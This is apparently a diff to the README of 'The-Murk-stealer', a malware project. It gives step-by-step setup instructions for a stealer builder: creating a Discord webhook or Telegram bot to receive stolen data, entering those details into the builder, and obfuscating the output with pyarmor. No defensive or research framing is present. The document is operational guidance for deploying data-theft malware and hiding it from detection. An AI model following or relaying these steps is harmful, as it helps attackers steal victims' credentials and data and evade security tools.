Choomai/The-Murk-stealer/README.md

 ### 🎮For Discord
 __So firstly you need to download [python](https://www.python.org/downloads/).
 Then you need to download the builder [here](https://github.com/Nick-Vinesmoke/The-Murk-stealer/releases/tag/The_Murk_v8.2.5).
 After that, you need to create your Discord server and webhook there.
 [How to do it](https://hookdeck.com/webhooks/platforms/how-to-get-started-with-discord-webhooks#conclusion).
 Finally, insert the name and webhook link in the builder.
+Better use building using pyarmor.
 And wait, secure building will take about 2 minutes.__

 ### 📨For Telegram
 So firstly, go to the [@BotFather](https://t.me/BotFather) bot and create your own bot.
 Then, you need to save token and bot name.
 Now you need to get your chat id.
 To do this, go to the next bot [@ShowJsonBot](https://t.me/ShowJsonBot) and save the id.
 Insert this data in builder console.
+Better use building using pyarmor.
 And wait, secure building will take about 2 minutes.

 ---